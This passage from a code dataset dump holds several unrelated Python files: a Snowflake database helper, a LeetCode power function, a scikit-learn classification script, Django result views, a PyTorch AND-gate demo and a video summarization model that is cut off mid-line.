query: query to execute\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n self.engine.execute(query)\n\n def sql_dataframe(self, query):\n \"\"\"Executes the query and return the queried results\n in a pandas dataframe.\n\n Args:\n query: query to execute\n Returns:\n df_result: pandas DataFrame of the queried result\n Raises:\n NA\n \"\"\"\n try:\n df_result = pd.read_sql(query, self.connection)\n except TypeError:\n df_result = pd.read_sql(query.replace(\"%\", \"%%\"), self.connection)\n return df_result\n\n def change_data_type(self, schema_name, table_name, column_name,\n data_type, db_name=\"BUSINESS_INTELLIGENCE\",\n need_confirmation=False, force=False, time_format='YYYY-MM-DD'):\n \"\"\"Change the data type of a column in a table\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n\n table_name: name of the table in snowflake\n\n column_name: name of the column\n\n data_type: name of the desired data type in string\n\n need_confirmation: prompts to ask if the change should be committed\n when set to True\n force: tries to force data type conversion then prompts to ask\n if the rows with invalid values should be dropped\n time_format: format of time the string value is in\n Returns:\n NA\n Raises:\n NA\n\n Below is the mapping between your desired data type and sql functions\n used for each one.\n\n If 'force' argument is given and it's set to 'True':\n sql_functions = {\n \"TIMESTAMP\":\"TRY_TO_TIMESTAMP\",\n \"DATE\":\"TRY_TO_DATE\",\n \"TIME\":\"TRY_TO_TIME\",\n \"NUMBER\":\"TRY_TO_NUMBER\",\n \"BINARY\":\"TRY_TO_BINARY\",\n \"BOOLEAN\":\"TRY_TO_BOOLEAN\",\n \"CHAR\":\"TO_CHAR\",\n \"NUMERIC\":\"TRY_TO_NUMERIC\",\n \"DECIMAL\":\"TRY_TO_DECIMAL\",\n \"DOUBLE\":\"TRY_TO_DOUBLE\",\n \"TIMESTAMP\":\"TRY_TO_TIMESTAMP\"\n }\n else if 'force' argument is not given or it's set to 'False'\n sql_functions = {\n \"TIMESTAMP\":\"TO_TIMESTAMP\",\n \"DATE\":\"TO_DATE\",\n \"TIME\":\"TO_TIME\",\n \"NUMBER\":\"TO_NUMBER\",\n \"BINARY\":\"TO_BINARY\",\n \"BOOLEAN\":\"TO_BOOLEAN\",\n \"CHAR\":\"TO_CHAR\",\n \"NUMERIC\":\"TO_NUMERIC\",\n \"DECIMAL\":\"TO_DECIMAL\",\n \"DOUBLE\":\"TO_DOUBLE\",\n \"TIMESTAMP\":\"TRY_TO_TIMESTAMP\"\n }\n \"\"\"\n # use the appropriate databae and schema\n self.query_executor(\"USE SCHEMA {dn}.{sn}\".format(dn=db_name,\n sn=schema_name))\n\n # add new column with prefix 'new_'\n self.query_executor(\"ALTER TABLE {tn} ADD NEW_{cn} {dt}\"\\\n .format(tn=table_name,\n cn=column_name,\n dt=data_type))\n\n # fetch the appropriate data type conversion sql function\n function_name = self._get_data_type_conversion_function(data_type,\n force)\n\n # update the newly created column\n if function_name in [\"TO_DATE\", \"TO_TIMESTAMP\"]:\n self.query_executor(\n \"Update {tn} SET NEW_{cn} = {fn}({cn},\" + \\\n \" '{date_format}')\"\\\n .format(tn=table_name,\n cn=column_name,\n fn=function_name,\n date_format=time_format))\n else:\n self.query_executor(\"Update {tn} SET NEW_{cn} = {fn}({cn})\"\\\n .format(tn=table_name,\n cn=column_name,\n fn=function_name))\n\n if force:\n # check for count of null values in the new column\n count = self.sql_dataframe(\n \"SELECT COUNT(*) as COUNT FROM {tn} WHERE NEW_{cn} IS NULL\"\\\n .format(tn=table_name,\n cn=column_name))[\"COUNT\"][0]\n total_count = self.sql_dataframe(\n \"SELECT COUNT(*) as COUNT FROM {tn}\"\\\n .format(tn=table_name,\n cn=column_name))[\"COUNT\"][0]\n # ask for user input as to if it's okay to drop those rows\n question = \"\"\"\n Would you like to drop {cnt} rows out of {tcnt} where the values of\n NEW_{cn} are NULL to complete the data type conversion?\n \\nAnswer 'yes' or 'no'\"\"\".format(cnt=count,\n tcnt=total_count,\n cn=column_name)\n if need_confirmation:\n answer = raw_input(question)\n if answer.lower() == \"yes\":\n self.query_executor(\n \"DELETE FROM {tn} WHERE NEW_{cn} IS NULL\".format(\n tn=table_name,\n cn=column_name))\n elif answer.lower() == \"no\":\n self.query_executor(\"ALTER TABLE {tn} DROP COLUMN NEW_{cn}\"\\\n .format(tn=table_name,\n cn=column_name))\n raise ValueError(\n \"Any changes you've made have been rolled back.\")\n else:\n self.query_executor(\"DELETE FROM {tn} WHERE NEW_{cn} IS NULL\"\\\n .format(tn=table_name,\n cn=column_name))\n\n if need_confirmation:\n answer = raw_input(\n \"Does the NEW_{cn} column look good?\\nAnswer 'yes' or 'no'\"\\\n .format(cn=column_name))\n if answer.lower() == \"yes\":\n pass\n elif answer.lower() == \"no\":\n self.query_executor(\n \"ALTER TABLE {tn} DROP COLUMN NEW_{cn}\".format(\n tn=table_name,\n cn=column_name))\n raise ValueError(\n \"Any changes you've made have been rolled back.\")\n\n # drop the old column\n self.query_executor(\"ALTER TABLE {tn} DROP COLUMN {cn}\".format(\n tn=table_name,\n cn=column_name))\n\n # rename the new column to replace the old column\n self.query_executor(\"ALTER TABLE {tn} RENAME COLUMN NEW_{cn} to {cn}\".\\\n format(tn=table_name,\n cn=column_name))\n\n\n def _get_data_type_conversion_function(self, data_type, force):\n \"\"\"Gets the sql function for the given data type.\n\n Args:\n data_type: name of the desired data type in string\n Returns:\n sql_function: sql_function in string\n Raises:\n NA\n \"\"\"\n #TODO add more sql functions for different data types\n if force:\n sql_functions = {\n \"TIMESTAMP\":\"TRY_TO_TIMESTAMP\",\n \"DATE\":\"TRY_TO_DATE\",\n \"TIME\":\"TRY_TO_TIME\",\n \"NUMBER\":\"TRY_TO_NUMBER\",\n \"BINARY\":\"TRY_TO_BINARY\",\n \"BOOLEAN\":\"TRY_TO_BOOLEAN\",\n \"CHAR\":\"TO_CHAR\",\n \"NUMERIC\":\"TRY_TO_NUMERIC\",\n \"DECIMAL\":\"TRY_TO_DECIMAL\",\n \"DOUBLE\":\"TRY_TO_DOUBLE\",\n \"TIMESTAMP\":\"TRY_TO_TIMESTAMP\"\n }\n elif not force:\n sql_functions = {\n \"TIMESTAMP\":\"TO_TIMESTAMP\",\n \"DATE\":\"TO_DATE\",\n \"TIME\":\"TO_TIME\",\n \"NUMBER\":\"TO_NUMBER\",\n \"BINARY\":\"TO_BINARY\",\n \"BOOLEAN\":\"TO_BOOLEAN\",\n \"CHAR\":\"TO_CHAR\",\n \"NUMERIC\":\"TO_NUMERIC\",\n \"DECIMAL\":\"TO_DECIMAL\",\n \"DOUBLE\":\"TO_DOUBLE\",\n \"TIMESTAMP\":\"TRY_TO_TIMESTAMP\"\n }\n return sql_functions[data_type.upper()]\n\n def _create_custom_engine(self, db_name, schema_name):\n \"\"\"Creates custom engine to Snowflake.\n\n Args:\n db_name: name of the database in snowflake\n\n schema_name: name of the schema in snowflake\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n url = URL(account=snowflake_creds[\"ACCOUNT\"],\n user=snowflake_creds[\"USER\"],\n password=snowflake_creds[\"PASSWORD\"],\n role=\"ACCOUNTADMIN\",\n database=db_name,\n schema=schema_name,\n numpy=True)\n custom_engine = create_engine(url, poolclass=NullPool)\n return custom_engine\n\n def _table_exists(self, table_name, schema_name, db_name):\n \"\"\"Checks to see if table exists.\n\n Args:\n table_name: name of the table in snowflake\n Returns:\n table_exists: boolean result of whether table exists or not\n Raises:\n NA\n \"\"\"\n self.query_executor(\"USE DATABASE {}\".format(db_name))\n df = self.sql_dataframe(\n \"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'\")\n df = df.loc[df.TABLE_SCHEMA==schema_name]\n if table_name in df.TABLE_NAME.unique():\n return True\n else:\n return False\n\n def _close_connection(self):\n \"\"\"Closes the open connection to Snowflake db.\n\n Args:\n NA\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n self.connection.close()\n\n def _drop_table(self, db_name, schema_name, table_name):\n \"\"\"Drops a table from Snowflake db.\n\n Args:\n NA\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n self.query_executor(\"USE SCHEMA {}.{}\".format(db_name,schema_name))\n self.query_executor(\"DROP TABLE {}\".format(table_name))\n\n def _grant_permission(self, db_name, schema_name, **kwargs):\n \"\"\"Grants permission to database objects.\n\n Args:\n db_name:\n\n schema_name:\n\n table_name:\n\n role_name:\n Returns:\n NA\n Raises:\n NA\n \"\"\"\n if \"role\" in kwargs:\n role = kwargs[\"role\"]\n else:\n role = \"BI_READ_ONLY\"\n\n self.query_executor(\"USE DATABASE {}\".format(db_name))\n self.query_executor(\n \"grant usage on schema {} to role {};\".format(schema_name, role))\n self.query_executor(\n \"grant all on all tables in schema {} to role {};\".format(\n schema_name, role))\n\n def _format_for_load(self, df):\n \"\"\"Formats the Pandas DataFrame for database load operation\n\n Args:\n df: Pandas DataFrame for formatting\n Returns:\n df: Formatted Pandas DataFrame\n Raises:\n NA\n \"\"\"\n try:\n datetime_cols = [x for x in df.columns if \"_date\" in x.lower()]\n except AttributeError as e:\n new_header = df.iloc[0]\n df = df[1:]\n df.columns = new_header\n datetime_cols = [x for x in df.columns if \"_date\" in x.lower()]\n except:\n raise ValueError(\"check your s3 object input\")\n for col in datetime_cols:\n df[col] = pd.to_datetime(df[col], errors = 'coerce')\n # if all values for the given column is na, then set it to string\n for col in df.columns:\n if df[col].isnull().all():\n df[col] = df[col].astype(str)\n return df\n\n def _get_bucket(self, filepath):\n \"\"\"Returns the relevant information regarding the s3 bucket in use\n\n Args:\n filepath: path to the flat file stored in s3\n Returns:\n dict_to_return: dictionary storing relevant information\n Raises:\n NA\n \"\"\"\n import inspect\n s3_buckets = S3Buckets()\n attributes = inspect.getmembers(s3_buckets,\n lambda a:not(inspect.isroutine(a)))\n attr_dict = {}\n for i in range(2, len(attributes)):\n attr_dict[attributes[i][1][\"prefix\"]] = i\n\n prefix = [prefix for prefix in attr_dict.keys() \\\n if(prefix in filepath)]\n if prefix:\n prefix = prefix[0]\n dict_to_return = attributes[attr_dict[prefix]][1]\n else:\n raise SnowflakeException(\"invalid filepath: not supported bucket.\"\\\n \"Contact BI to add your s3 bucket to s3_bucket configuration file\")\n return dict_to_return\n","sub_path":"bi_db/snowflake_connection.py","file_name":"snowflake_connection.py","file_ext":"py","file_size_in_byte":30237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"373596819","text":"# If n = 0, then return 1\n# If n = 1, then return x\n# Otherwise, x^n = x^n/2 * x ^n/2 if n is even\n# x^n = x^ (n-1)/2 * x^(n-1)/2 if n is odd\nclass Solution:\n def myPow(self, x: float, n: int) -> float:\n def calculatePow(x, n):\n if n == 0:\n return 1\n elif n == 1:\n return x\n else:\n m = int(n / 2)\n y = calculatePow(x, m)\n if n % 2 == 0:\n return y * y\n else:\n return y * y * x\n\n if n < 0:\n return 1 / calculatePow(x, -n)\n else:\n return calculatePow(x, n)\n","sub_path":"面试-LeetCode题/基础算法5-分治法/LeetCode50(Pow)/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"298314706","text":"from sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.multiclass import OneVsOneClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nimport pandas as pd\nimport numpy as np\nimport itertools as iter\nimport sys\nsys.path.insert(0, 'General_Functions_Code')\nimport PerMinData as pmd\nimport combine_labels_features as clf\nimport label_to_array as lta\n\nif __name__ == \"__main__\":\n training_df = clf.combine_files('New_Processed_Data/train_label_preprocessed3.csv',\n 'New_Processed_Data/train_feat_preprocessed2.csv')\n validation_df = clf.combine_files('New_Processed_Data/test_label_preprocessed3.csv',\n 'New_Processed_Data/test_feat_preprocessed2.csv')\n test_df = clf.combine_files('New_Processed_Data/online_test_label_preprocessed3.csv',\n 'New_Processed_Data/online_test_feat_preprocessed2.csv')\n\n features = ['HR', 'BR', 'Posture', 'Activity', 'PeakAccel',\n 'BRAmplitude', 'ECGAmplitude', 'ECGNoise', 'HRConfidence',\n 'VerticalMin', 'VerticalPeak', 'LateralMin', 'LateralPeak',\n 'SagittalMin', 'SagittalPeak', 'AuxADC1', 'AuxADC2',\n 'AuxADC3']\n feature_combinations = []\n for k in range(1, len(features)):\n feature_combinations += list(iter.combinations(features, k))\n feature_combinations = [list(x) for x in feature_combinations]\n\n # features = ['HR', 'BR', 'Posture', 'Activity', 'PeakAccel',\n # 'BRAmplitude', 'ECGAmplitude', 'ECGNoise', 'HRConfidence',\n # 'VerticalMin', 'VerticalPeak', 'LateralMin', 'LateralPeak',\n # 'SagittalMin', 'SagittalPeak', 'AuxADC1', 'AuxADC2',\n # 'AuxADC3']\n # Activity, PeakAccel, ECGAmplitude, ECGNoise, VerticalMin, LateralMin, LateralPeak, SagittalMin, SagittalPeak\n\n label_to_number_dict = {'lift': 0,\n 'lying': 1,\n 'sitting': 2,\n 'snowboarding': 3,\n 'standing': 4,\n 'towlift': 5}\n\n accuracy_list = []\n for features in feature_combinations:\n training_array = training_df[features].values\n training_labels = pd.read_csv('New_Processed_Data/train_label_preprocessed3.csv')['Label'].values\n averaged_t_array = pmd.average_per_minute(training_array)\n averaged_t_labels = np.array([label_to_number_dict[x] for x in pd.read_csv('New_Processed_Data/train_label_preprocessed2.csv')['activity'].values])\n\n validation_array = validation_df[features].values\n validation_labels = pd.read_csv('New_Processed_Data/test_label_preprocessed3.csv')['Label'].values\n averaged_v_array = pmd.average_per_minute(validation_array)\n averaged_v_labels = np.array([label_to_number_dict[x] for x in pd.read_csv('New_Processed_Data/test_label_preprocessed2.csv')['activity'].values])\n\n test_array = test_df[features].values\n test_labels = pd.read_csv('New_Processed_Data/online_test_label_preprocessed3.csv')['Label'].values\n averaged_test_array = pmd.average_per_minute(test_array)\n averaged_test_labels = np.array([label_to_number_dict[x] for x in pd.read_csv('New_Processed_Data/online_test_label_preprocessed2.csv')['activity'].values])\n\n X = averaged_t_array\n Y = averaged_t_labels\n v_X = averaged_v_array\n v_Y = averaged_v_labels\n\n\n\n prediction = OneVsRestClassifier(estimator=LinearSVC(random_state=5, max_iter=256)).fit(X, Y).predict(v_X) # i = 5, j = 256\n # prediction = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(128, 12), random_state=i, max_iter=1000).fit(X, Y).predict(v_X) # (128, 12), i = 13, 1e-1\n # prediction = OneVsOneClassifier(LinearSVC(random_state=i, max_iter=20000)).fit(X, Y).predict(v_X) # 763, i=0\n\n count = 0\n for j in range(len(v_Y)):\n if v_Y[j] == prediction[j]:\n count += 1\n accuracy_list.append(count / len(v_Y))\n print(max(accuracy_list))\n print(np.array(accuracy_list))\n print(max(accuracy_list))\n print(accuracy_list.index(max(accuracy_list)))\n","sub_path":"Tim/SKLearnStuff.py","file_name":"SKLearnStuff.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"278096140","text":"from json import dumps as json_dumps\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import QueryDict\nfrom django.http.response import HttpResponse\nfrom django.shortcuts import get_object_or_404, render\n\nfrom validator.doi import get_doi_for_validation\nfrom validator.forms import PublishingForm, ResultsSortingForm\nfrom validator.models import ValidationRun\nfrom validator.validation.globals import METRICS\nfrom validator.validation.graphics import get_dataset_combis_and_metrics_from_files\n\nfrom collections import OrderedDict\n\n\n@login_required(login_url='/login/')\ndef user_runs(request):\n current_user = request.user\n\n sorting_form, order = ResultsSortingForm.get_sorting(request)\n\n page = request.GET.get('page', 1)\n cur_user_runs = (\n ValidationRun.objects.filter(user=current_user)\n .order_by(order)\n )\n\n paginator = Paginator(cur_user_runs, 10)\n try:\n paginated_runs = paginator.page(page)\n except PageNotAnInteger:\n paginated_runs = paginator.page(1)\n except EmptyPage:\n paginated_runs = paginator.page(paginator.num_pages)\n\n context = {\n 'myruns': paginated_runs,\n 'sorting_form': sorting_form,\n }\n return render(request, 'validator/user_runs.html', context)\n\n\ndef result(request, result_uuid):\n val_run = get_object_or_404(ValidationRun, pk=result_uuid)\n if(request.method == 'DELETE'):\n ## make sure only the owner of a validation can delete it (others are allowed to GET it, though)\n if(val_run.user != request.user):\n return HttpResponse(status=403)\n\n ## check that our validation can be deleted; it can't if it already has a DOI\n if(not val_run.is_unpublished):\n return HttpResponse(status=405) #405\n\n val_run.delete()\n return HttpResponse(\"Deleted.\", status=200)\n\n elif(request.method == 'PATCH'):\n ## make sure only the owner of a validation can change it (others are allowed to GET it, though)\n\n if(val_run.user != request.user):\n return HttpResponse(status=403)\n\n patch_params = QueryDict(request.body)\n\n if 'save_name' in patch_params:\n ## check that our validation's name can be changed'; it can't if it already has a DOI\n if (not val_run.is_unpublished):\n return HttpResponse('Validation has been published', status=405)\n\n save_mode = patch_params['save_name']\n\n if save_mode != 'true':\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n val_run.name_tag = patch_params['new_name']\n val_run.save()\n\n return HttpResponse(\"Changed.\", status=200)\n\n\n if 'archive' in patch_params:\n archive_mode = patch_params['archive']\n\n if not ((archive_mode == 'true') or (archive_mode == 'false')):\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n val_run.archive(unarchive = (archive_mode == 'false'))\n return HttpResponse(\"Changed.\", status=200)\n\n if 'extend' in patch_params:\n extend = patch_params['extend']\n\n if extend != 'true':\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n val_run.extend_lifespan()\n return HttpResponse(val_run.expiry_date, status=200)\n\n if 'publish' in patch_params:\n publish = patch_params['publish']\n\n # check we've got the action set correctly\n if publish != 'true':\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n # check that the publication parameters are valid\n pub_form = PublishingForm(data=patch_params, validation=val_run)\n if not pub_form.is_valid():\n # if not, send back an updated publication form with errors set and http code 420 (picked up in javascript)\n return render(request, 'validator/publishing_dialog.html', {'publishing_form': pub_form, 'val': val_run}, status=420)\n\n try:\n get_doi_for_validation(val_run, pub_form.pub_metadata)\n except Exception as e:\n m = getattr(e, 'message', repr(e))\n return HttpResponse(m, status=400)\n\n return HttpResponse(\"Published.\", status=200)\n\n return HttpResponse(\"Wrong action parameter.\", status=400)\n\n # by default, show page\n else:\n ## tell template whether it's the owner of the validation - to show action buttons\n is_owner = (val_run.user == request.user)\n\n ## TODO: get time in format like '2 minutes', '5 hours'\n run_time = None\n if val_run.end_time is not None:\n run_time = val_run.end_time - val_run.start_time\n run_time = (run_time.days * 1440) + (run_time.seconds // 60)\n\n error_rate = 1\n if val_run.total_points != 0:\n error_rate = (val_run.total_points - val_run.ok_points) / val_run.total_points\n\n pairs, triples, metrics, ref0_config = get_dataset_combis_and_metrics_from_files(val_run)\n combis = OrderedDict(sorted({**pairs, **triples}.items()))\n # the publication form is only needed by the owner; if we're displaying for another user, avoid leaking user data\n pub_form = PublishingForm(validation=val_run) if is_owner else None\n\n metrics = OrderedDict(sorted([(v, k) for k, v in metrics.items()]))\n\n context = {\n 'is_owner': is_owner,\n 'val' : val_run,\n 'error_rate' : error_rate,\n 'run_time': run_time,\n 'metrics': metrics,\n 'combis': combis,\n 'json_metrics': json_dumps(METRICS),\n 'publishing_form': pub_form\n }\n\n return render(request, 'validator/result.html', context)\n","sub_path":"validator/views/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"538736312","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 26 17:24:24 2020\r\n\r\n@author: Harsh Chaudhary\r\n\"\"\"\r\n\r\nimport torch\r\nfrom torch import nn, optim\r\n\r\n\r\ndata = torch.Tensor([[0, 0], [0, 1], [1, 0], [1, 1]])\r\nlabel = torch.Tensor([[0], [0], [0], [1]])\r\n\r\nclass AND_GATE(nn.Module):\r\n def __init__(self):\r\n super(AND_GATE, self).__init__()\r\n \r\n self.fc1 = nn.Linear(2, 1)\r\n #self.fc2 = nn.Linear(3, 1)\r\n \r\n def forward(self, x):\r\n x = torch.sigmoid(self.fc1(x))\r\n #x = self.fc2(x)\r\n return x\r\n\r\nmodel = AND_GATE()\r\ncriterion = nn.MSELoss()\r\noptimizer = optim.SGD(model.parameters(), lr = 1)\r\n\r\nepochs = 1000\r\nfor e in range(epochs):\r\n train_loss = 0\r\n\r\n output = model(data)\r\n loss = criterion(output, label)\r\n \r\n train_loss += loss.item()\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n \r\n if e%100==0:\r\n print('epoch {}: Training loss: {:.4f}'.format(e+1, train_loss))\r\n\r\ndef test(a, b):\r\n input_values = torch.Tensor([[a, b]])\r\n output = model(input_values)\r\n print(list(map(fun, output)))\r\n\r\ndef fun(x):\r\n if x>0.5:\r\n return 1\r\n return 0\r\n","sub_path":"AND_GATE.py","file_name":"AND_GATE.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"574170228","text":"# -*- coding: utf-8 -*-\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nfrom .lstmcell import StackedLSTMCell\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\n# class sLSTM(nn.Module):\n# def __init__(self, input_size, hidden_size, num_layers=2):\n# \"\"\"Scoring LSTM\"\"\"\n# super().__init__()\n#\n# self.lstm = nn.LSTM(input_size, hidden_size, num_layers, bidirectional=True)\n# self.out = nn.Sequential(\n# nn.Linear(hidden_size * 2, 1), # bidirection => scalar\n# nn.Sigmoid())\n#\n# def forward(self, features, difference_attention, init_hidden=None):\n# \"\"\"\n# Args:\n# features: [seq_len, 1, 100] (compressed pool5 features)\n# Return:\n# scores [seq_len, 1]\n# \"\"\"\n# self.lstm.flatten_parameters()\n#\n# # [seq_len, 1, hidden_size * 2]\n# features, (h_n, c_n) = self.lstm(features)\n#\n# # [seq_len, 1]\n# scores = self.out(features.squeeze(1))\n# return scores\n\nclass sLSTM(nn.Module):\n def __init__(self, input_size, hidden_size=256, num_layers=2, m=4, video_type='summe'):\n super().__init__()\n self.out = nn.Sigmoid()\n\n if video_type == 'summe':\n self.nframes = 9721\n else:\n self.nframes = 19406\n\n self.fc2 = nn.Linear(self.nframes, self.nframes)\n self.fc2.weight.data.normal_(0, 1)\n if self.fc2.bias.data is not None:\n self.fc2.bias.data.zero_()\n\n self.fc_last = nn.Sequential(\n self.fc2,\n nn.Sigmoid())\n\n self.csnet_objects = CSNET(input_size, hidden_size, num_layers, m, video_type)\n self.csnet_places = CSNET(input_size, hidden_size, num_layers, m, video_type)\n self.out = nn.Sigmoid()\n\n def forward(self, features, places365_features, difference_attention):\n obj_cm, obj_sm, obj_dt = self.csnet_objects(features, difference_attention['objects'])\n places365_cm, places365_sm, places365_dt = self.csnet_places(places365_features, difference_attention['places'])\n\n #intermmediate fusion\n # sum scores\n cm_scores = obj_cm + places365_cm\n sm_scores = obj_sm + places365_sm\n # sum attentions\n difference_attention = obj_dt + places365_dt\n scores = self.out(sm_scores + cm_scores + difference_attention)\n rest = torch.zeros(int(self.nframes - scores.size(0))).to(device)\n scores = torch.cat((scores, rest))\n self.fc2.weight.data[features.size(0):, :] = torch.zeros(self.fc2.weight.data[features.size(0):, :].size())\n scores = self.fc_last(scores)\n scores = scores[0:features.size(0)]\n return scores.unsqueeze(1)\n\n\nclass CSNET(nn.Module):\n def __init__(self, input_size, hidden_size=256, num_layers=2, m=4, video_type='summe'):\n \"\"\"Scoring LSTM\"\"\"\n super().__init__()\n self.m = m\n self.lstm = nn.LSTM(input_size, hidden_size, num_layers, bidirectional=True)\n self.fc = nn.Linear(hidden_size * 2, 1) # bidirection => scalar\n\n\n def forward(self, features, difference_attention):\n self.lstm.flatten_parameters()\n\n # [seq_len, 1, hidden_size * 2]\n # strides stream\n sm_idxs = self.compute_sm(features)\n sm_idxs = self.flatten(list(sm_idxs.values()))\n\n sm_scores = torch.zeros(features.size(0)).to(device)\n sm = features[sm_idxs]\n sm, (h_n, c_n) = self.lstm(sm)\n sm = self.fc(sm)\n for idx, out in zip(sm_idxs, sm):\n sm_scores[idx] = out\n\n # chunks stream\n cm_idxs = self.compute_cm(features)\n cm_idxs = self.flatten(list(cm_idxs.values()))\n\n cm_scores = torch.zeros(features.size(0)).to(device)\n cm = features[cm_idxs]\n cm, (h_n, c_n) = self.lstm(cm)\n cm = self.fc(cm)\n for idx, out in zip(cm_idxs, cm):\n cm_scores[idx] = out\n # cm_scores.unsqueeze_(1)\n difference_attention = difference_attention.squeeze(1)\n return cm_scores, sm_scores, difference_attention\n\n # stride streams\n # [Eq. 4]\n def compute_sm(self, image_features):\n T = image_features.size(0)\n M = k = self.m\n sm_idxs = {}\n for m in range(M):\n end = m + T - k\n idxs = []\n for i in range(0, T):\n val = i * k + m\n if val >= end:\n idxs.append(end)\n break\n else:\n idxs.append(val)\n sm_idxs[m] = idxs\n return sm_idxs\n\n # chunk streams\n # [Eq. 3]\n def compute_cm(self, image_features):\n T = image_features.size(0)\n n_chunks = self.m\n cm_idxs = {}\n for m in range(1, n_chunks + 1):\n fraction = torch.tensor(T / n_chunks)\n start = (m - 1) * torch.ceil(fraction)\n end = m * torch.ceil(fraction) - 1\n idxs = []\n for i in range(T):\n if i >= start and i <= end:\n idxs.append(i)\n # print('m {}, start {}, end {}'.format(m, start, end))\n # print(idxs)\n cm_idxs[m] = idxs\n return cm_idxs\n\n def flatten(self, t):\n return [item for sublist in t for item in sublist]\n\n\nclass eLSTM(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers=2):\n \"\"\"Encoder LSTM\"\"\"\n super().__init__()\n\n self.lstm = nn.LSTM(input_size, hidden_size, num_layers)\n\n self.linear_mu = nn.Linear(hidden_size, hidden_size)\n self.linear_var = nn.Linear(hidden_size, hidden_size)\n\n def forward(self, frame_features):\n \"\"\"\n Args:\n frame_features: [seq_len, 1, hidden_size]\n Return:\n last hidden\n h_last [num_layers=2, 1, hidden_size]\n c_last [num_layers=2, 1, hidden_size]\n \"\"\"\n self.lstm.flatten_parameters()\n _, (h_last, c_last) = self.lstm(frame_features)\n\n return (h_last, c_last)\n\n\nclass dLSTM(nn.Module):\n def __init__(self, input_size=2048, hidden_size=2048, num_layers=2):\n \"\"\"Decoder LSTM\"\"\"\n super().__init__()\n\n self.lstm_cell = StackedLSTMCell(num_layers, input_size, hidden_size)\n self.out = nn.Linear(hidden_size, input_size)\n\n def forward(self, seq_len, init_hidden):\n \"\"\"\n Args:\n seq_len (int)\n init_hidden\n h [num_layers=2, 1, hidden_size]\n c [num_layers=2, 1, hidden_size]\n Return:\n out_features: [seq_len, 1, hidden_size]\n \"\"\"\n\n batch_size = init_hidden[0].size(1)\n hidden_size = init_hidden[0].size(2)\n\n x = Variable(torch.zeros(batch_size, hidden_size)).to(device)\n h, c = init_hidden # (h_0, c_0): last state of eLSTM\n\n out_features = []\n for i in range(seq_len):\n # last_h: [1, hidden_size] (h from last layer)\n # last_c: [1, hidden_size] (c from last layer)\n # h: [2=num_layers, 1, hidden_size] (h from all layers)\n # c: [2=num_layers, 1, hidden_size] (c from all layers)\n (last_h, last_c), (h, c) = self.lstm_cell(x, (h, c))\n x = self.out(last_h)\n out_features.append(last_h)\n # list of seq_len '[1, hidden_size]-sized Variables'\n return out_features\n\n\nclass VAE(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers=2):\n super().__init__()\n self.e_lstm = eLSTM(input_size, hidden_size, num_layers)\n self.d_lstm = dLSTM(input_size, hidden_size, num_layers)\n\n self.softplus = nn.Softplus()\n\n def reparameterize(self, mu, log_variance):\n \"\"\"Sample z via reparameterization trick\n Args:\n mu: [num_layers, hidden_size]\n log_var: [num_layers, hidden_size]\n Return:\n h: [num_layers, 1, hidden_size]\n \"\"\"\n std = torch.exp(0.5 * log_variance)\n\n # e ~ N(0,1)\n epsilon = Variable(torch.randn(std.size())).to(device)\n\n # [num_layers, 1, hidden_size]\n return (mu + epsilon * std).unsqueeze(1)\n\n def forward(self, features):\n \"\"\"\n Args:\n features: [seq_len, 1, hidden_size]\n Return:\n h: [2=num_layers, 1, hidden_size]\n decoded_features: [seq_len, 1, 2048]\n \"\"\"\n seq_len = features.size(0)\n\n # [num_layers, 1, hidden_size]\n h, c = self.e_lstm(features)\n\n # [num_layers, hidden_size]\n h = h.squeeze(1)\n\n # [num_layers, hidden_size]\n h_mu = self.e_lstm.linear_mu(h)\n h_log_variance = torch.log(self.softplus(self.e_lstm.linear_var(h)))\n\n # [num_layers, 1, hidden_size]\n h = self.reparameterize(h_mu, h_log_variance)\n\n # [seq_len, 1, hidden_size]\n decoded_features = self.d_lstm(seq_len, init_hidden=(h, c))\n\n # [seq_len, 1, hidden_size]\n # reverse\n decoded_features.reverse()\n decoded_features = torch.stack(decoded_features)\n return h_mu, h_log_variance, decoded_features\n\n\nclass Summarizer(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers=2, m=4, video_type='summe'):\n super().__init__()\n self.s_lstm = sLSTM(input_size, hidden_size, num_layers, m, video_type)\n # self.csnet = CSNET(input_size, hidden_size, num_layers)\n self.vae = VAE(input_size, hidden_size, num_layers)\n\n def forward(self, image_features, places365_features, difference_attention, uniform=False):\n # Apply weights\n if not uniform:\n # [seq_len, 1]\n scores = self.s_lstm(image_features, places365_features, difference_attention)\n # scores = self.csnet(image_features, difference_attention)\n # print(scores)\n\n # [seq_len, 1, hidden_size]\n weighted_features = image_features * scores.view(-1, 1, 1)\n else:\n 